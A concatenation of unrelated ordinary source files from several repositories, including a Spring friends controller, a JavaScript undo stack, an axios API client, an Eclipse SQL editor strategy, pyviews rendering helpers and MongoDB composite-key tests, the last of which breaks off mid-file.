    @PostMapping("/decline/{fromuser}")
    public ResponseEntity<Void> declineFriendRequest(@PathVariable String fromuser) {
        friendsService.declineFriendRequest(authService.getCurrentUser(), fromuser);
        return new ResponseEntity<>(HttpStatus.OK);
    }

    /** Cancels a friend request previously sent by the current user. */
    @PostMapping("/cancel/{fromuser}")
    public ResponseEntity<Void> cancelFriendRequest(@PathVariable String fromuser) {
        friendsService.cancelFriendRequest(authService.getCurrentUser(), fromuser);
        return new ResponseEntity<>(HttpStatus.OK);
    }

    /** Returns the friendship status between the current user and {@code withuser}. */
    @GetMapping("/{withuser}")
    public ResponseEntity<FriendsDto> getFriendshipStatus(@PathVariable String withuser) {
        FriendsDto friendship = friendsService.findFriendshipStatus(authService.getCurrentUser(), withuser);
        return new ResponseEntity<>(friendship, HttpStatus.OK);
    }

    /** Lists the usernames with pending requests towards the current user. */
    @GetMapping("/requests")
    public ResponseEntity<List<String>> getFriendRequests() {
        List<String> requestList = friendsService.getFriendRequests(authService.getCurrentUser());
        return new ResponseEntity<>(requestList, HttpStatus.OK);
    }

    /**
     * Lists the friends of {@code ofuser}.
     * Renamed from a confusingly identical overload of getFriendRequests;
     * handler methods are invoked only via the mapping annotation, so the
     * rename does not affect any caller.
     */
    @GetMapping("/all/{ofuser}")
    public ResponseEntity<List<String>> getFriendsOfUser(@PathVariable String ofuser) {
        List<String> friendList = friendsService.getFriendsOfUser(ofuser);
        return new ResponseEntity<>(friendList, HttpStatus.OK);
    }
}
|
mimifitz/IOMED
|
node_modules/@elastic/eui/test-env/services/index.js
|
"use strict";
var _interopRequireWildcard = require("@babel/runtime/helpers/interopRequireWildcard");
Object.defineProperty(exports, "__esModule", {
value: true
});
Object.defineProperty(exports, "accessibleClickKeys", {
enumerable: true,
get: function get() {
return _accessibility.accessibleClickKeys;
}
});
Object.defineProperty(exports, "cascadingMenuKeys", {
enumerable: true,
get: function get() {
return _accessibility.cascadingMenuKeys;
}
});
Object.defineProperty(exports, "comboBoxKeys", {
enumerable: true,
get: function get() {
return _accessibility.comboBoxKeys;
}
});
Object.defineProperty(exports, "htmlIdGenerator", {
enumerable: true,
get: function get() {
return _accessibility.htmlIdGenerator;
}
});
Object.defineProperty(exports, "LEFT_ALIGNMENT", {
enumerable: true,
get: function get() {
return _alignment.LEFT_ALIGNMENT;
}
});
Object.defineProperty(exports, "RIGHT_ALIGNMENT", {
enumerable: true,
get: function get() {
return _alignment.RIGHT_ALIGNMENT;
}
});
Object.defineProperty(exports, "CENTER_ALIGNMENT", {
enumerable: true,
get: function get() {
return _alignment.CENTER_ALIGNMENT;
}
});
Object.defineProperty(exports, "isColorDark", {
enumerable: true,
get: function get() {
return _color.isColorDark;
}
});
Object.defineProperty(exports, "isValidHex", {
enumerable: true,
get: function get() {
return _color.isValidHex;
}
});
Object.defineProperty(exports, "calculateContrast", {
enumerable: true,
get: function get() {
return _color.calculateContrast;
}
});
Object.defineProperty(exports, "calculateLuminance", {
enumerable: true,
get: function get() {
return _color.calculateLuminance;
}
});
Object.defineProperty(exports, "hexToHsv", {
enumerable: true,
get: function get() {
return _color.hexToHsv;
}
});
Object.defineProperty(exports, "hexToRgb", {
enumerable: true,
get: function get() {
return _color.hexToRgb;
}
});
Object.defineProperty(exports, "hsvToHex", {
enumerable: true,
get: function get() {
return _color.hsvToHex;
}
});
Object.defineProperty(exports, "hsvToRgb", {
enumerable: true,
get: function get() {
return _color.hsvToRgb;
}
});
Object.defineProperty(exports, "rgbToHex", {
enumerable: true,
get: function get() {
return _color.rgbToHex;
}
});
Object.defineProperty(exports, "rgbToHsv", {
enumerable: true,
get: function get() {
return _color.rgbToHsv;
}
});
Object.defineProperty(exports, "VISUALIZATION_COLORS", {
enumerable: true,
get: function get() {
return _color.VISUALIZATION_COLORS;
}
});
Object.defineProperty(exports, "DEFAULT_VISUALIZATION_COLOR", {
enumerable: true,
get: function get() {
return _color.DEFAULT_VISUALIZATION_COLOR;
}
});
Object.defineProperty(exports, "colorPalette", {
enumerable: true,
get: function get() {
return _color.colorPalette;
}
});
Object.defineProperty(exports, "euiPaletteForLightBackground", {
enumerable: true,
get: function get() {
return _color.euiPaletteForLightBackground;
}
});
Object.defineProperty(exports, "euiPaletteForDarkBackground", {
enumerable: true,
get: function get() {
return _color.euiPaletteForDarkBackground;
}
});
Object.defineProperty(exports, "euiPaletteColorBlind", {
enumerable: true,
get: function get() {
return _color.euiPaletteColorBlind;
}
});
Object.defineProperty(exports, "euiPaletteColorBlindBehindText", {
enumerable: true,
get: function get() {
return _color.euiPaletteColorBlindBehindText;
}
});
Object.defineProperty(exports, "euiPaletteForStatus", {
enumerable: true,
get: function get() {
return _color.euiPaletteForStatus;
}
});
Object.defineProperty(exports, "euiPaletteForTemperature", {
enumerable: true,
get: function get() {
return _color.euiPaletteForTemperature;
}
});
Object.defineProperty(exports, "euiPaletteComplimentary", {
enumerable: true,
get: function get() {
return _color.euiPaletteComplimentary;
}
});
Object.defineProperty(exports, "euiPaletteNegative", {
enumerable: true,
get: function get() {
return _color.euiPaletteNegative;
}
});
Object.defineProperty(exports, "euiPalettePositive", {
enumerable: true,
get: function get() {
return _color.euiPalettePositive;
}
});
Object.defineProperty(exports, "euiPaletteCool", {
enumerable: true,
get: function get() {
return _color.euiPaletteCool;
}
});
Object.defineProperty(exports, "euiPaletteWarm", {
enumerable: true,
get: function get() {
return _color.euiPaletteWarm;
}
});
Object.defineProperty(exports, "euiPaletteGray", {
enumerable: true,
get: function get() {
return _color.euiPaletteGray;
}
});
Object.defineProperty(exports, "useColorPickerState", {
enumerable: true,
get: function get() {
return _color_picker.useColorPickerState;
}
});
Object.defineProperty(exports, "useColorStopsState", {
enumerable: true,
get: function get() {
return _color_picker.useColorStopsState;
}
});
Object.defineProperty(exports, "copyToClipboard", {
enumerable: true,
get: function get() {
return _copy_to_clipboard.copyToClipboard;
}
});
Object.defineProperty(exports, "formatAuto", {
enumerable: true,
get: function get() {
return _format.formatAuto;
}
});
Object.defineProperty(exports, "formatBoolean", {
enumerable: true,
get: function get() {
return _format.formatBoolean;
}
});
Object.defineProperty(exports, "formatDate", {
enumerable: true,
get: function get() {
return _format.formatDate;
}
});
Object.defineProperty(exports, "formatNumber", {
enumerable: true,
get: function get() {
return _format.formatNumber;
}
});
Object.defineProperty(exports, "formatText", {
enumerable: true,
get: function get() {
return _format.formatText;
}
});
Object.defineProperty(exports, "dateFormatAliases", {
enumerable: true,
get: function get() {
return _format.dateFormatAliases;
}
});
Object.defineProperty(exports, "isEvenlyDivisibleBy", {
enumerable: true,
get: function get() {
return _number.isEvenlyDivisibleBy;
}
});
Object.defineProperty(exports, "isWithinRange", {
enumerable: true,
get: function get() {
return _number.isWithinRange;
}
});
Object.defineProperty(exports, "Pager", {
enumerable: true,
get: function get() {
return _paging.Pager;
}
});
Object.defineProperty(exports, "Random", {
enumerable: true,
get: function get() {
return _random.Random;
}
});
Object.defineProperty(exports, "getSecureRelForTarget", {
enumerable: true,
get: function get() {
return _security.getSecureRelForTarget;
}
});
Object.defineProperty(exports, "toInitials", {
enumerable: true,
get: function get() {
return _string.toInitials;
}
});
Object.defineProperty(exports, "PropertySortType", {
enumerable: true,
get: function get() {
return _sort.PropertySortType;
}
});
Object.defineProperty(exports, "SortDirectionType", {
enumerable: true,
get: function get() {
return _sort.SortDirectionType;
}
});
Object.defineProperty(exports, "SortDirection", {
enumerable: true,
get: function get() {
return _sort.SortDirection;
}
});
Object.defineProperty(exports, "SortableProperties", {
enumerable: true,
get: function get() {
return _sort.SortableProperties;
}
});
Object.defineProperty(exports, "Comparators", {
enumerable: true,
get: function get() {
return _sort.Comparators;
}
});
Object.defineProperty(exports, "calculatePopoverPosition", {
enumerable: true,
get: function get() {
return _popover.calculatePopoverPosition;
}
});
Object.defineProperty(exports, "findPopoverPosition", {
enumerable: true,
get: function get() {
return _popover.findPopoverPosition;
}
});
Object.defineProperty(exports, "getDurationAndPerformOnFrame", {
enumerable: true,
get: function get() {
return _transition.getDurationAndPerformOnFrame;
}
});
Object.defineProperty(exports, "getTransitionTimings", {
enumerable: true,
get: function get() {
return _transition.getTransitionTimings;
}
});
Object.defineProperty(exports, "getWaitDuration", {
enumerable: true,
get: function get() {
return _transition.getWaitDuration;
}
});
Object.defineProperty(exports, "performOnFrame", {
enumerable: true,
get: function get() {
return _transition.performOnFrame;
}
});
Object.defineProperty(exports, "EuiWindowEvent", {
enumerable: true,
get: function get() {
return _window_event.EuiWindowEvent;
}
});
Object.defineProperty(exports, "useDependentState", {
enumerable: true,
get: function get() {
return _hooks.useDependentState;
}
});
exports.keys = void 0;
var keys = _interopRequireWildcard(require("./keys"));
exports.keys = keys;
var _accessibility = require("./accessibility");
var _alignment = require("./alignment");
var _color = require("./color");
var _color_picker = require("./color_picker");
var _copy_to_clipboard = require("./copy_to_clipboard");
var _format = require("./format");
var _number = require("./number");
var _paging = require("./paging");
var _random = require("./random");
var _security = require("./security");
var _string = require("./string");
var _sort = require("./sort");
var _popover = require("./popover");
var _transition = require("./transition");
var _window_event = require("./window_event");
var _hooks = require("./hooks");
|
hhd3/Mark-Mind
|
src/renderer/mind/command/stack.js
|
/**
 * Bounded undo/redo command stack.
 *
 * Commands must expose execute(), undo() and redo(). At most `limit`
 * commands (default 30) are kept undoable; executing a new command discards
 * the redo history. `change(command)` is an overridable hook fired after
 * every mutation, and save()/dirty() track whether state has changed since
 * the last save point.
 */
class Stack {
  constructor(limit) {
    this.limit = limit || 30;
    this.undos = [];
    this.redos = [];
    this.saveCommand = null;
  }

  // Run a new command: redo history is invalidated and the oldest undo
  // entry is dropped once the limit is reached.
  execute(command) {
    this.clearRedo();
    command.execute();
    if (this.undos.length >= this.limit) {
      this.undos.shift();
    }
    this.undos.push(command);
    this.change(command);
  }

  undo() {
    if (!this.canUndo()) {
      return;
    }
    const command = this.undos.pop();
    this.redos.push(command);
    command.undo();
    this.change(command);
  }

  canUndo() {
    return this.undos.length > 0;
  }

  redo() {
    if (!this.canRedo()) {
      return;
    }
    const command = this.redos.pop();
    this.undos.push(command);
    command.redo();
    this.change(command);
  }

  canRedo() {
    return this.redos.length > 0;
  }

  // Mark the current top of the undo stack as the saved state.
  save() {
    this.saveCommand = this.undos[this.undos.length - 1];
  }

  // True when state differs from the last save point (loose inequality kept
  // deliberately: null vs undefined compare equal on an empty stack).
  dirty() {
    return this.saveCommand != this.undos[this.undos.length - 1];
  }

  clearRedo() {
    this.redos = [];
  }

  clear() {
    this.undos = [];
    this.redos = [];
    this.saveCommand = null;
    this.change({ name: 'clear' });
  }

  // Overridable notification hook; receives the command that changed state.
  change() { }
}
export default Stack;
|
corder-ybh/xcEduCode
|
xc-framework-model/src/main/java/com/xuecheng/framework/domain/goods/response/CategoryResult.java
|
package com.xuecheng.framework.domain.goods.response;
import com.xuecheng.framework.domain.goods.Category;
import com.xuecheng.framework.model.response.ResponseResult;
import com.xuecheng.framework.model.response.ResultCode;
import lombok.Data;
/**
 * Response wrapper pairing the standard result code with a single
 * {@link Category} payload.
 */
@Data
public class CategoryResult extends ResponseResult {
    // The category payload carried by this response (package-private,
    // accessors generated by Lombok's @Data).
    Category category;

    public CategoryResult(ResultCode resultCode, Category category) {
        super(resultCode);
        this.category = category;
    }
}
|
Sanjeevani19/data-hub-central-community
|
ui/src/api/OSApi.js
|
<reponame>Sanjeevani19/data-hub-central-community
import axios from 'axios';
/**
 * Thin client for the /api/os/* endpoints (flow management, gradle tasks
 * and Data Hub deployment). Each method resolves to { response: payload }
 * on success — except getDataHubConfig, which resolves to the raw payload —
 * and resolves to the error object on failure (errors are logged, never
 * rethrown). Leftover debug console.log statements (including the
 * misspelled "In deloyToDHS") have been removed; console.error is kept.
 */
export default {
  name: 'OSApi',
  getFlowNames() {
    return axios
      .get('/api/os/getFlowNames/')
      .then(response => {
        return { response: response.data };
      })
      .catch(error => {
        console.error('error:', error);
        return error;
      });
  },
  runFlows() {
    return axios
      .post('/api/os/runFlows/')
      .then(response => {
        return { response: response.data };
      })
      .catch(error => {
        console.error('error:', error);
        return error;
      });
  },
  deployToDH() {
    return axios
      .get('/api/os/deployToDH/')
      .then(response => {
        return { response: response.data };
      })
      .catch(error => {
        console.error('error:', error);
        return error;
      });
  },
  /**
   * Runs a gradle task on the server.
   * @param {string} command gradle task name, sent as { task: command }
   */
  gradle(command) {
    return axios
      .post('/api/os/gradle/', { task: command })
      .then(response => {
        return { response: response.data };
      })
      .catch(error => {
        console.error('error:', error);
        return error;
      });
  },
  // NOTE: unlike the other calls this resolves to response.data directly;
  // callers depend on that shape, so it is intentionally left as-is.
  getDataHubConfig() {
    return axios
      .get('/api/os/getDHprojectConfig/')
      .then(response => {
        return response.data;
      })
      .catch(error => {
        console.error('Error getting DHS config:', error);
        return error;
      });
  }
};
|
opengauss-mirror/DataStudio
|
code/datastudio/src/org.opengauss.mppdbide.view/src/org/opengauss/mppdbide/view/core/sourceeditor/SQLDoubleClickStrategy.java
|
<filename>code/datastudio/src/org.opengauss.mppdbide.view/src/org/opengauss/mppdbide/view/core/sourceeditor/SQLDoubleClickStrategy.java
/*
* Copyright (c) 2022 Huawei Technologies Co.,Ltd.
*
* openGauss is licensed under Mulan PSL v2.
* You can use this software according to the terms and conditions of the Mulan PSL v2.
* You may obtain a copy of Mulan PSL v2 at:
*
* http://license.coscl.org.cn/MulanPSL2
*
* THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
* EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
* MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
* See the Mulan PSL v2 for more details.
*/
package org.opengauss.mppdbide.view.core.sourceeditor;
import org.eclipse.jface.text.BadLocationException;
import org.eclipse.jface.text.IDocument;
import org.eclipse.jface.text.ITextDoubleClickStrategy;
import org.eclipse.jface.text.ITextViewer;
import org.opengauss.mppdbide.utils.logger.MPPDBIDELoggerUtility;
import org.opengauss.mppdbide.view.utils.CharPairsUtil;
import org.opengauss.mppdbide.view.utils.DSDefaultCharacterPairMatcherUtil;
import org.opengauss.mppdbide.view.utils.DSRegion;
/**
*
* Title: class
*
* Description: The Class SQLDoubleClickStrategy.
*
* @since 3.0.0
*/
public class SQLDoubleClickStrategy implements ITextDoubleClickStrategy {
/**
* The text.
*/
protected ITextViewer fText;
/**
* The current position.
*/
protected int currentPosition;
/**
* The start position.
*/
protected int startPosition;
/**
* The end position.
*/
protected int endPosition;
/**
* Instantiates a new SQL double click strategy.
*/
public SQLDoubleClickStrategy() {
super();
}
/**
 * Handles a double click in the viewer: first tries to select a matched
 * bracket/quote block at the click offset, falling back to selecting the
 * word under the cursor.
 *
 * @param viewer the viewer that received the double click
 */
@Override
public void doubleClicked(ITextViewer viewer) {
    fText = viewer;
    currentPosition = viewer.getSelectedRange().x;
    boolean clickOutsideDocument = currentPosition < 0 || currentPosition > fText.getDocument().getLength();
    if (clickOutsideDocument) {
        return;
    }
    try {
        if (!selectBracketBlock()) {
            selectWord();
        }
    } catch (BadLocationException exception) {
        // Selection is simply abandoned on a bad location; log and continue.
        MPPDBIDELoggerUtility.error("SQLDoubleClickStrategy.doubleClicked(): BadLocationException occurred.",
                exception);
    }
}
/**
* Match brackets at.
*
* @return true, if successful
* @throws BadLocationException the bad location exception
*/
protected boolean matchBracketsAt() throws BadLocationException {
boolean isForward = true;
CharPairsUtil fPairs = new CharPairsUtil(DSDefaultCharacterPairMatcherUtil.getMatchPunctuations());
DSRegion region = (DSRegion) DSDefaultCharacterPairMatcherUtil.getRegion(fText.getDocument(), currentPosition,
fPairs, isForward, DSDefaultCharacterPairMatcherUtil.SQL_PARTITIONING, true, false);
if (null != region) {
String partition = null != region.getPartitionType() ? region.getPartitionType() : "";
if ((partition.equals(DSDefaultCharacterPairMatcherUtil.SQL_DOUBLE_QUOTES_IDENTIFIER)
|| partition.equals(DSDefaultCharacterPairMatcherUtil.SQL_STRING)) && region.getForward()) {
startPosition = region.getOffset() - 1;
endPosition = region.getOffset() + region.getLength() - 1;
return true;
} else {
startPosition = region.getOffset();
endPosition = region.getOffset() + region.getLength() - 1;
return true;
}
}
return false;
}
/**
* Match word.
*
* @return true, if successful
*/
protected boolean matchWord() {
IDocument doc = fText.getDocument();
try {
int position = currentPosition;
char chr;
// Scan back to get the beginning of the word.
while (position >= 0) {
chr = doc.getChar(position);
if (!Character.isJavaIdentifierPart(chr)) {
break;
}
--position;
}
startPosition = position;
// Scan forward for the end of the word.
position = currentPosition;
int length = doc.getLength();
while (position < length) {
chr = doc.getChar(position);
if (!Character.isJavaIdentifierPart(chr)) {
break;
}
++position;
}
endPosition = position;
return true;
} catch (BadLocationException exception) {
// do nothing
MPPDBIDELoggerUtility.error("SQLDoubleClickStrategy.matchWord(): BadLocationException occurred.",
exception);
}
return false;
}
/**
* Select bracket block.
*
* @return true, if successful
* @throws BadLocationException the bad location exception
*/
protected boolean selectBracketBlock() throws BadLocationException {
if (matchBracketsAt()) {
if (startPosition == endPosition) {
fText.setSelectedRange(startPosition, 0);
} else {
fText.setSelectedRange(startPosition + 1, endPosition - startPosition - 1);
}
return true;
}
return false;
}
/**
* Select word.
*/
protected void selectWord() {
if (matchWord()) {
if (startPosition == endPosition) {
fText.setSelectedRange(startPosition, 0);
} else {
fText.setSelectedRange(startPosition + 1, endPosition - startPosition - 1);
}
}
}
}
|
eumis/pyviews
|
pyviews/rendering/common.py
|
"""Common functionality for rendering package"""
from contextlib import contextmanager
from contextvars import ContextVar
from functools import wraps
from typing import Iterator, Union

from injectool import dependency

from pyviews.core import PyViewsError, InheritedDict, Node, XmlNode, InstanceNode, ViewInfo
class RenderingError(PyViewsError):
    """Error raised when a rendering step fails; carries the view info of the failing view."""

    def __init__(self, message: str = None, view_info: ViewInfo = None):
        super().__init__(message=message, view_info=view_info)
class RenderingContext(dict):
    """Dict-based container for the arguments handed to each rendering step.

    The named properties below are convenience accessors over well-known keys;
    arbitrary extra values can still be stored as plain dict items.
    """

    @property
    def node_globals(self) -> InheritedDict:
        """Globals available to the node being rendered."""
        return self.get('node_globals')

    @node_globals.setter
    def node_globals(self, value):
        self['node_globals'] = value

    @property
    def parent_node(self) -> Union[Node, InstanceNode]:
        """Node under which the current node is rendered."""
        return self.get('parent_node')

    @parent_node.setter
    def parent_node(self, value: Union[Node, InstanceNode]):
        self['parent_node'] = value

    @property
    def xml_node(self) -> XmlNode:
        """Xml node the rendering step operates on."""
        return self.get('xml_node')

    @xml_node.setter
    def xml_node(self, value: XmlNode):
        self['xml_node'] = value
@dependency
def get_child_context(xml_node: XmlNode, parent_node: Node,
                      _: RenderingContext) -> RenderingContext:
    """Create the rendering context for a child xml node of parent_node.

    The child gets its own node_globals inheriting from the parent's globals.
    The third argument (the current context) is unused but kept for the
    dependency signature.
    """
    return RenderingContext({
        'parent_node': parent_node,
        'node_globals': InheritedDict(parent_node.node_globals),
        'xml_node': xml_node
    })
_CONTEXT_VAR: ContextVar[RenderingContext] = ContextVar('rendering_context')
@contextmanager
def use_context(context: RenderingContext) -> Iterator[RenderingContext]:
    """Make ``context`` the current rendering context for the ``with`` block.

    Stores the context in the module-level context variable and restores the
    previous value on exit, even if the block raises.

    Note: the return annotation was corrected to Iterator[RenderingContext] —
    a @contextmanager-decorated generator yields the context, it does not
    return it.
    """
    token = _CONTEXT_VAR.set(context)
    try:
        yield context
    finally:
        _CONTEXT_VAR.reset(token)
def get_rendering_context() -> RenderingContext:
    """Return the current rendering context, or None if none has been set."""
    return _CONTEXT_VAR.get(None)
def pass_rendering_context(func):
    """Decorator that injects the current rendering context.

    The wrapped callable is invoked with the current rendering context added
    as the ``rendering_context`` keyword argument.
    """
    @wraps(func)
    def _with_context(*args, **kwargs):
        return func(*args, **kwargs, rendering_context=get_rendering_context())

    return _with_context
|
hmrc/manage-transit-movements-departure-frontend
|
test/base/SpecBase.scala
|
<reponame>hmrc/manage-transit-movements-departure-frontend<filename>test/base/SpecBase.scala
/*
* Copyright 2022 HM Revenue & Customs
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package base
import config.FrontendAppConfig
import models.{EoriNumber, Index, LocalReferenceNumber, UserAnswers}
import org.scalatest.concurrent.{IntegrationPatience, ScalaFutures}
import org.scalatest.freespec.AnyFreeSpec
import org.scalatest.matchers.must.Matchers
import org.scalatest.{EitherValues, OptionValues, TryValues}
import org.scalatestplus.mockito.MockitoSugar
import org.scalatestplus.play.guice.GuiceOneAppPerSuite
import pages.QuestionPage
import play.api.i18n.{Messages, MessagesApi}
import play.api.inject.Injector
import play.api.libs.json.{Json, Reads, Writes}
import play.api.mvc.AnyContentAsEmpty
import play.api.test.FakeRequest
import uk.gov.hmrc.http.HeaderCarrier
/**
 * Base trait for test specs: wires ScalaTest (free spec + matchers + value
 * helpers), Guice application bootstrapping, Mockito sugar and async patience,
 * and exposes common fixture values (EORI, LRN, indexes, empty answers).
 */
trait SpecBase
    extends AnyFreeSpec
    with Matchers
    with OptionValues
    with EitherValues
    with GuiceOneAppPerSuite
    with TryValues
    with ScalaFutures
    with IntegrationPatience
    with MockitoSugar {

  // Shared fixture values used across specs.
  val eoriNumber: EoriNumber = EoriNumber("GB1234567891234")
  // .get is safe here: the literal is a valid LRN by construction.
  val lrn: LocalReferenceNumber = LocalReferenceNumber("ABCD1234567890123").get

  // Index(0) aliases for readability at call sites.
  val index: Index = Index(0)
  val referenceIndex: Index = Index(0)
  val documentIndex: Index = Index(0)
  val itemIndex: Index = Index(0)
  val packageIndex: Index = Index(0)
  val containerIndex: Index = Index(0)

  def fakeRequest: FakeRequest[AnyContentAsEmpty.type] = FakeRequest("", "")

  val emptyUserAnswers: UserAnswers = UserAnswers(lrn, eoriNumber, Json.obj())

  implicit val hc: HeaderCarrier = HeaderCarrier()

  // Accessors into the Guice application under test.
  def injector: Injector = app.injector

  def messagesApi: MessagesApi = injector.instanceOf[MessagesApi]

  implicit def messages: Messages = messagesApi.preferred(fakeRequest)

  def frontendAppConfig: FrontendAppConfig = injector.instanceOf[FrontendAppConfig]

  /**
   * Convenience syntax for manipulating UserAnswers in tests; setters unwrap
   * the Try/Option results so specs fail fast on invalid writes.
   */
  implicit class RichUserAnswers(userAnswers: UserAnswers) {

    def getValue[T](page: QuestionPage[T])(implicit rds: Reads[T]): T =
      userAnswers.get(page).value

    def setValue[T](page: QuestionPage[T], value: T)(implicit wts: Writes[T]): UserAnswers =
      userAnswers.set(page, value).success.value

    def setValue[T](page: QuestionPage[T], value: Option[T])(implicit wts: Writes[T]): UserAnswers =
      value.map(setValue(page, _)).getOrElse(userAnswers)

    def removeValue(page: QuestionPage[_]): UserAnswers =
      userAnswers.remove(page).success.value
  }
}
|
manovotn/core
|
impl/src/test/java/org/jboss/weld/tests/unit/VersionTest.java
|
package org.jboss.weld.tests.unit;
import org.jboss.weld.util.reflection.Formats;
import org.junit.Test;
import static org.junit.Assert.assertEquals;
public class VersionTest {

    /** Build timestamp used by the cases that supply one. */
    private static final String TIMESTAMP = "1981-28-12 17:00";

    /**
     * Exercises Formats.version() across SNAPSHOT and qualifier versions,
     * with and without a build timestamp.
     */
    @Test
    public void testVersionParser() {
        // SNAPSHOT versions show the timestamp when one is available...
        checkVersion("1.0.0 (1981-28-12 17:00)", "1.0.0-SNAPSHOT", TIMESTAMP);
        checkVersion("1.0 (1981-28-12 17:00)", "1.0-SNAPSHOT", TIMESTAMP);
        checkVersion("1 (1981-28-12 17:00)", "1-SNAPSHOT", TIMESTAMP);
        // ...and fall back to the SNAPSHOT label when there is none.
        checkVersion("1.0.0 (SNAPSHOT)", "1.0.0-SNAPSHOT", null);
        checkVersion("1.0 (SNAPSHOT)", "1.0-SNAPSHOT", null);
        checkVersion("1 (SNAPSHOT)", "1-SNAPSHOT", null);
        // Dot-separated qualifiers always show the qualifier, never the timestamp.
        checkVersion("1.0.0 (BETA1)", "1.0.0.BETA1", TIMESTAMP);
        checkVersion("1.0 (BETA1)", "1.0.BETA1", TIMESTAMP);
        checkVersion("1 (BETA1)", "1.BETA1", TIMESTAMP);
        checkVersion("1.0.0 (BETA1)", "1.0.0.BETA1", null);
        checkVersion("1.0 (BETA1)", "1.0.BETA1", null);
        checkVersion("1 (BETA1)", "1.BETA1", null);
        // Dash-separated qualifiers behave identically.
        checkVersion("1.0.0 (BETA1)", "1.0.0-BETA1", TIMESTAMP);
        checkVersion("1.0 (BETA1)", "1.0-BETA1", TIMESTAMP);
        checkVersion("1 (BETA1)", "1-BETA1", TIMESTAMP);
        checkVersion("1.0.0 (BETA1)", "1.0.0-BETA1", null);
        checkVersion("1.0 (BETA1)", "1.0-BETA1", null);
        checkVersion("1 (BETA1)", "1-BETA1", null);
    }

    /** Asserts that Formats.version(version, timestamp) renders as expected. */
    private static void checkVersion(String expected, String version, String timestamp) {
        assertEquals(expected, Formats.version(version, timestamp));
    }
}
|
nosamanuel/babel-but-with-guy-fieri
|
packages/babel-plugin-transform-typescript/test/fixtures/function/parameters/expected.js
|
// Babel transform-typescript fixture: the expected JS output after stripping
// TypeScript-only syntax from function parameters (rest + default params remain).
function f(x, ...y) {}
function g(x = 0) {}
|
open-AIMS/ereefs-database
|
src/test/java/au/gov/aims/ereefs/database/DatabaseClientTest.java
|
<reponame>open-AIMS/ereefs-database
/*
* Copyright (c) Australian Institute of Marine Science, 2021.
* @author <NAME> <<EMAIL>>
*/
package au.gov.aims.ereefs.database;
import com.mongodb.MongoWriteException;
import com.mongodb.client.MongoClient;
import com.mongodb.client.MongoCollection;
import com.mongodb.client.MongoDatabase;
import org.bson.Document;
import org.json.JSONArray;
import org.json.JSONObject;
import org.junit.Assert;
import org.junit.Test;
public class DatabaseClientTest extends DatabaseTestBase {

    /**
     * Test DB connection to the in-memory Database server.
     */
    @Test
    public void testConnection() {
        DatabaseClient client = this.getDatabaseClient();
        Assert.assertNotNull("The database client is null", client);
    }

    /**
     * Builds a document whose "_id" is the composite object {id, type}
     * and which carries a single "key" attribute. Shared by the
     * composite-key tests below.
     */
    private static Document compositeKeyDocument(int id, String type, String value) {
        JSONObject json = new JSONObject()
                .put("_id", new JSONObject()
                        .put("id", id)
                        .put("type", type))
                .put("key", value);
        return Document.parse(json.toString());
    }

    /**
     * Documentation about the "_id" field:
     * <ul>
     *     <li>https://docs.mongodb.com/manual/core/document/#document-id-field</li>
     * </ul>
     *
     * <p>Example of arbitrary JSONObject used for _id:</p>
     * <ul>
     *     <li>https://stackoverflow.com/questions/3298963/how-to-set-a-primary-key-in-mongodb#answer-34950608</li>
     *     <li>https://github.com/Automattic/mongoose/issues/2276</li>
     * </ul>
     */
    @Test
    public void testCompositeKeyObject() {
        DatabaseClient client = this.getDatabaseClient();
        try (MongoClient mongoClient = client.getMongoClient()) {
            MongoDatabase database = client.getMongoDatabase(mongoClient);

            String tableName = "objectkey";
            database.createCollection(tableName);

            JSONObject json = new JSONObject()
                    .put("_id", new JSONObject()
                            .put("key1", "v1")
                            .put("key2", "v2"))
                    .put("key", "value");

            MongoCollection<Document> collection = database.getCollection(tableName, Document.class);
            collection.insertOne(Document.parse(json.toString()));
        }
    }

    /**
     * Inserting several documents with distinct composite keys succeeds.
     */
    @Test
    public void testCompositeKeyObjectMultipleEntry() {
        DatabaseClient client = this.getDatabaseClient();
        try (MongoClient mongoClient = client.getMongoClient()) {
            MongoDatabase database = client.getMongoDatabase(mongoClient);

            String tableName = "objectkey";
            database.createCollection(tableName);

            MongoCollection<Document> collection = database.getCollection(tableName, Document.class);
            collection.insertOne(compositeKeyDocument(1, "data", "value1"));
            collection.insertOne(compositeKeyDocument(2, "data", "value2"));
            collection.insertOne(compositeKeyDocument(1, "metadata", "value3"));
        }
    }

    /**
     * Throws:
     *     com.mongodb.MongoWriteException: E11000 duplicate key error collection: testdb.objectkey index: _id_ dup key: { : { id: 1, type: "data" } }
     */
    @Test(expected = MongoWriteException.class)
    public void testCompositeKeyObjectDuplicateKey() {
        DatabaseClient client = this.getDatabaseClient();
        try (MongoClient mongoClient = client.getMongoClient()) {
            MongoDatabase database = client.getMongoDatabase(mongoClient);

            String tableName = "objectkey";
            database.createCollection(tableName);

            MongoCollection<Document> collection = database.getCollection(tableName, Document.class);
            collection.insertOne(compositeKeyDocument(1, "data", "value1"));
            collection.insertOne(compositeKeyDocument(2, "data", "value2"));
            collection.insertOne(compositeKeyDocument(1, "metadata", "value3"));
            // Same composite _id as the first insert: must be rejected.
            collection.insertOne(compositeKeyDocument(1, "data", "value4"));
        }
    }

    /**
     * Test to validate that Array ID are not valid with MongoDB.
     * Throws:
     *     com.mongodb.MongoWriteException: can't use an array for _id
     *
     * Documentation about the "_id" field
     *     "The _id field may contain values of any BSON data type, other than an array."
     *     https://docs.mongodb.com/manual/core/document/#the-_id-field
     * List of BSON data types:
     *     https://docs.mongodb.com/manual/reference/bson-types/
     *
     * https://docs.mongodb.com/manual/core/document/#field-names
     *     "The field name _id is reserved for use as a primary key; its value must be unique in the collection, is immutable, and may be of any type other than an array."
     */
    @Test(expected = MongoWriteException.class)
    public void testCompositeKeyArray() {
        DatabaseClient client = this.getDatabaseClient();
        try (MongoClient mongoClient = client.getMongoClient()) {
            MongoDatabase database = client.getMongoDatabase(mongoClient);

            String tableName = "arraykey";
            database.createCollection(tableName);

            JSONObject json = new JSONObject()
                    .put("_id", new JSONArray()
                            .put("key1")
